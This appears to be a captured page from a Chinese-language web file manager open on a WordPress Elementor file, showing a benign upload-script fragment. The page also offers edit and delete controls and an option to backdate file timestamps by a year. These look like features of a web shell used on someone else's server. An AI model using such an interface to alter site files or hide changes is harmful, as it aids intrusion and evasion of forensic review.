文件操作 - common.strings.js
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/forteagencynew/public_html/wp-content/plugins/elementor/assets/js/common.strings.js
编辑文件内容
__( 'Uploading...' ), sticky: true, } ); } return args; } applyAfterCreate( data, args ) { if ( args.options?.progress ) { this.toast.hide(); } return data; } async run() { this.file = this.args.file; if ( this.file.size > parseInt( window._wpPluploadSettings.defaults.filters.max_file_size, 10 ) ) { throw new Error( __( 'The file exceeds the maximum upload size for this site.', 'elementor' );
修改文件时间
将文件时间修改为当前时间的前一年
删除文件